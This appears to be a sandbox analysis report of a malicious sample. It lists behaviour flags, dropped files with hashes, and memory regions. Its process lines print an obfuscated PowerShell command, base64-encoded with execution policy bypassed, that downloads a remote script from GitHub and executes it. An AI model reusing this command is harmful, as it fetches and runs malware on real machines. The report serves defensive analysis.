C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
0f49574acd4f54227055d966b15fffc0
SHA16c4559636c5735ed5c4d8ad033b8bf65985fc1fb
SHA256562ad9b139d5772493df4dad3a80c63c5b30075520b3f9d71ba45be6c7870a4b
SHA512ea70444ee71f48d6bac93226e91c97c3f8223d4a3ad283f7cf54f389983624bb14b7b7f60faf788716b8acc5be96e26951355f65ad3a9b23841f797a6dd2dbc2
-
C:\Users\Admin\AppData\Local\Temp\RES84D5.tmpMD5
cfe544b5b87e214a2c41395e165a220e
SHA1f8a91380023342ae84d2a8aeedf8ff97e566d668
SHA256a6563dba05c41f0d02e8cea5d56ed247954ec71ac8bc0fd8d99ce434725fb310
SHA512b1108c89dfa8bd2584a0ed3807b11758191a9af5934fd7569178c12b26936038c7903f1b7c32bdbdf55e000b0c9fa0ff99dfd70a4152915dd682fda108d61f77
-
C:\Users\Admin\AppData\Local\Temp\RES87C3.tmpMD5
40c3d22fed240f12ce06e914810f0501
SHA1f4eced5a6100d67c54717692dc4b30b811fe3952
SHA25670248a186a8f0a7098860ba76e965ac57811bbaea169449bd54226a13faf1064
SHA512af15a0c0be2aedebbaa8667448abdb85fe39b97814342383557c175cf3b24a7af6da67f9dc0bc42eda38b058e88fc297ef4582d7d96c5ade8ad6ec61862d5207
-
C:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.dllMD5
2fc8166fbe209032e00f78e29a8adcf9
SHA14b0f73cbf7ce31d709abee2006317c6aa8fe9597
SHA2566311e4c23e7ad6fb28eb1e94d3e6104f761ae35b30b7fbd0ebc44a6940791ee4
SHA512359a1e0f9fe1c71230075f2d52b82e36b69978675c05230c1347df253db5914815b77ca3cc7bb0b2bae134f1f61abdb2899e497dbfe3963f17f309ac3fb80be9
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
37330f50cf392bca59567a22de3b836a
SHA1f7b37328533a133567aa28f03015da69e2e36547
SHA256a34c2923388f87e84a4f67f123626af4eff5e7d7e5abe327b6a1b1aa55a12de1
SHA5125d1c19df182caf82388fd05e30422fa957af30a4092334a53a128e36d6c3ce2cb20aa10d96344cd8b1b145180df4d737b30bbd48a1c809ce25a82912397b19a6
-
C:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.dllMD5
19eba50c43c59f9c2c3903396d881558
SHA14450609c36d991061b9ecfe4905535c1429bdfd8
SHA2567adbd62789e6e22b6c48ca179db6f3fb5a1dc3d427cc4b7bf88e181804315cac
SHA5120410fd4b64b8b36588c84323811e1b36f6ccbfaafcf612940f7634956ec440e4a32af75479adbad0c36d090df4e22b82c917620f2b7017d605e1337906d745c5
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\CSC6C4D9FC6F68E48DCBD114890A44A2246.TMPMD5
4254059f4973b50684414a2bda46be55
SHA1acaf290f7b83b08cc6c8c41788bed67d35e7c276
SHA25671363967ffa06a49433462418a77f870cb295bc01bd555c5ecffd79fd731171d
SHA5128e4b6437fc12a24cb07375c484a18080658eb72b018fad9b1fb2cd4689b386ef49b2038f4b8f692b694ae9a8402ab9485147bf6270e601c9c76d2e941473e6f3
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.0.csMD5
fdff1f264c5f5570a5393659b154cb88
SHA1de254de5e517074a9986b36fec83f921aa9aa497
SHA256ff936e8436684fa709bed64fea9021468fd0c744a4e3412b3ef86e642d6c3769
SHA512db434d37d6e5acb096c26abe7f07744a1a1379179f013810df3f95e41e2b7f55dfe7dc65d053a3d0c6401bc13c7dd99e940073fbe741237966620761c3b9e35a
-
\??\c:\Users\Admin\AppData\Local\Temp\mtv2wuy1\mtv2wuy1.cmdlineMD5
0177062d5d1795c4887e86ebfec0e62e
SHA1446f5951282dba06d39bfca3862c5ee5642c16ec
SHA256da15160a760723bdb6178c39972ddca5896858dab4dbc4466592a1a19000ed04
SHA51247da8edf08e25e6943a94a4367738b0d1e8ee839d201009fff7fed2293b010387f07e26791154d2c06d09d141a1f4f43eab478fe2f7af80d9ee7af7cf02fa087
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\CSCC53057A6C714A0B9B24DD4662F9C538.TMPMD5
ef7a1e47e2050ac0ecc86132672a6ebf
SHA168e0fc03f29b151213016bc78fcaccbb10922bea
SHA256d1672349e9639f246f611d1c30c2ef1cfe21fac0d66a36a527565d6ac2e97019
SHA512f3282f8b94bf9d3ee1dc42d3bf60f3830becf13dc4d226720d40d8a600a61d08fa4eca1fe8e67d40525bf3d4b01a4bc1b9921cc46d62a106b15b1cc767ae1b24
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.0.csMD5
fe552aa471e3747e57ddeff23d6da1fc
SHA116832293206ec339d47940533443f4fb375826fa
SHA25660122a8ad7d370fa8dd0ca1b65f1b7685128c526195ac2ffb4edab103d45208d
SHA5128cc715d2ad259d557b818e86b9fab2f91186ca4b1cde477218c0943313ec587d87499288598a2c64969fe2ee6eaf2132c269869f6a7201cf82100620d3ce34e6
-
\??\c:\Users\Admin\AppData\Local\Temp\zowv1r1s\zowv1r1s.cmdlineMD5
4c763707ff20c22394c152bbc21463de
SHA18270ed773cad155be82616cc785356899a97a0c3
SHA256611d31f459d86cf10734d88452163197280d23652168d5cc95fdc5d797698303
SHA51287dd44ec20f2e2e6754e9ef59d4d1b1a788c044febf5ea015aebc282b3d16757a0983caa3b027bb618dd3b63fcea5edc1e7ecf1f20a49f44ddd3b2a040813442
-
\Windows\Branding\mediasrv.pngMD5
b69939766105d4046be4491143b39330
SHA17ae64736d59fc0a88194e660a517e9d6a767ae71
SHA256136505bce328a92a2cae17917808b38e14566dc8cf2cafc07a082e0b1faeeb83
SHA5121abbce8e75f420b238c24f8465e71d2ab774bee2ab340c125da7a03613f5a88b39c39a5d419a2a95949e8c7eafb58d309a52dd4b33e181f8ab60669e12a667ab
-
\Windows\Branding\mediasvc.pngMD5
7507da4d158eb385afcb6ac8aa8ddc32
SHA1863311e2958e9635799ba60521b6a508f0457118
SHA2560b27dc9deb3071f8ef7bde42f0acec45047055d261f6ad626b16cb90981cecfc
SHA512321265108ebbfd617d8b67d70237b08a13585f2c8b4dafca4695bebb1d6c3aabda3a582434f004441ce5019d356958337eddd590dd8215bcb4376495e5d28f73
-
memory/364-21-0x0000000000000000-mapping.dmp
-
memory/572-88-0x0000000000000000-mapping.dmp
-
memory/796-82-0x0000000000000000-mapping.dmp
-
memory/796-18-0x0000000000000000-mapping.dmp
-
memory/984-68-0x0000000000000000-mapping.dmp
-
memory/1120-83-0x0000000000000000-mapping.dmp
-
memory/1180-63-0x0000000000000000-mapping.dmp
-
memory/1236-27-0x0000000000000000-mapping.dmp
-
memory/1264-85-0x0000000000000000-mapping.dmp
-
memory/1312-30-0x0000000000000000-mapping.dmp
-
memory/1352-71-0x0000000000000000-mapping.dmp
-
memory/1412-84-0x0000000000000000-mapping.dmp
-
memory/1560-86-0x0000000000000000-mapping.dmp
-
memory/1572-87-0x0000000000000000-mapping.dmp
-
memory/1776-90-0x0000000000000000-mapping.dmp
-
memory/1884-43-0x00000157D3496000-0x00000157D3498000-memory.dmpFilesize
8KB
-
memory/1884-38-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/1884-44-0x00000157D3498000-0x00000157D349A000-memory.dmpFilesize
8KB
-
memory/1884-40-0x00000157D3493000-0x00000157D3495000-memory.dmpFilesize
8KB
-
memory/1884-39-0x00000157D3490000-0x00000157D3492000-memory.dmpFilesize
8KB
-
memory/1884-37-0x0000000000000000-mapping.dmp
-
memory/2052-73-0x0000000000000000-mapping.dmp
-
memory/2164-72-0x0000000000000000-mapping.dmp
-
memory/2260-67-0x0000000000000000-mapping.dmp
-
memory/2264-81-0x0000000000000000-mapping.dmp
-
memory/2464-34-0x000001376CDB0000-0x000001376CDB1000-memory.dmpFilesize
4KB
-
memory/2464-14-0x000001376CDF0000-0x000001376CDF1000-memory.dmpFilesize
4KB
-
memory/2464-13-0x0000013752C50000-0x0000013752C52000-memory.dmpFilesize
8KB
-
memory/2464-15-0x0000013752C53000-0x0000013752C55000-memory.dmpFilesize
8KB
-
memory/2464-25-0x000001376CD80000-0x000001376CD81000-memory.dmpFilesize
4KB
-
memory/2464-35-0x000001376D3C0000-0x000001376D3C1000-memory.dmpFilesize
4KB
-
memory/2464-10-0x0000000000000000-mapping.dmp
-
memory/2464-17-0x0000013752C56000-0x0000013752C58000-memory.dmpFilesize
8KB
-
memory/2464-12-0x0000013754650000-0x0000013754651000-memory.dmpFilesize
4KB
-
memory/2464-36-0x000001376D750000-0x000001376D751000-memory.dmpFilesize
4KB
-
memory/2464-60-0x0000013752C58000-0x0000013752C59000-memory.dmpFilesize
4KB
-
memory/2464-11-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/2504-89-0x0000000000000000-mapping.dmp
-
memory/2932-66-0x0000000000000000-mapping.dmp
-
memory/3156-78-0x0000000000000000-mapping.dmp
-
memory/3424-80-0x0000000000000000-mapping.dmp
-
memory/3428-79-0x0000000000000000-mapping.dmp
-
memory/3588-76-0x0000000000000000-mapping.dmp
-
memory/3916-45-0x0000000000000000-mapping.dmp
-
memory/3916-46-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/3916-48-0x00000204DDF60000-0x00000204DDF62000-memory.dmpFilesize
8KB
-
memory/3916-49-0x00000204DDF63000-0x00000204DDF65000-memory.dmpFilesize
8KB
-
memory/3916-51-0x00000204DDF66000-0x00000204DDF68000-memory.dmpFilesize
8KB
-
memory/4040-92-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4040-96-0x000001F3BF873000-0x000001F3BF875000-memory.dmpFilesize
8KB
-
memory/4040-95-0x000001F3BF870000-0x000001F3BF872000-memory.dmpFilesize
8KB
-
memory/4040-91-0x0000000000000000-mapping.dmp
-
memory/4040-99-0x000001F3BF876000-0x000001F3BF878000-memory.dmpFilesize
8KB
-
memory/4040-102-0x000001F3BF878000-0x000001F3BF879000-memory.dmpFilesize
4KB
-
memory/4144-77-0x0000000000000000-mapping.dmp
-
memory/4200-61-0x0000000000000000-mapping.dmp
-
memory/4256-70-0x0000000000000000-mapping.dmp
-
memory/4400-64-0x0000000000000000-mapping.dmp
-
memory/4432-59-0x000002287EBE8000-0x000002287EBEA000-memory.dmpFilesize
8KB
-
memory/4432-52-0x0000000000000000-mapping.dmp
-
memory/4432-58-0x000002287EBE6000-0x000002287EBE8000-memory.dmpFilesize
8KB
-
memory/4432-53-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4432-55-0x000002287EBE0000-0x000002287EBE2000-memory.dmpFilesize
8KB
-
memory/4432-57-0x000002287EBE3000-0x000002287EBE5000-memory.dmpFilesize
8KB
-
memory/4508-100-0x0000000000000000-mapping.dmp
-
memory/4516-97-0x0000000000000000-mapping.dmp
-
memory/4520-98-0x0000000000000000-mapping.dmp
-
memory/4568-65-0x0000000000000000-mapping.dmp
-
memory/4592-101-0x0000000000000000-mapping.dmp
-
memory/4596-69-0x0000000000000000-mapping.dmp
-
memory/4620-62-0x0000000000000000-mapping.dmp
-
memory/4688-2-0x0000000000210000-0x00000000006FA000-memory.dmpFilesize
4.9MB
-
memory/4688-3-0x00007FFCF1480000-0x00007FFCF1E6C000-memory.dmpFilesize
9.9MB
-
memory/4688-4-0x000001E439400000-0x000001E4396B3000-memory.dmpFilesize
2.7MB
-
memory/4688-6-0x000001E47F310000-0x000001E47F312000-memory.dmpFilesize
8KB
-
memory/4688-8-0x000001E47F315000-0x000001E47F316000-memory.dmpFilesize
4KB
-
memory/4688-9-0x000001E47F316000-0x000001E47F317000-memory.dmpFilesize
4KB
-
memory/4688-7-0x000001E47F313000-0x000001E47F315000-memory.dmpFilesize
8KB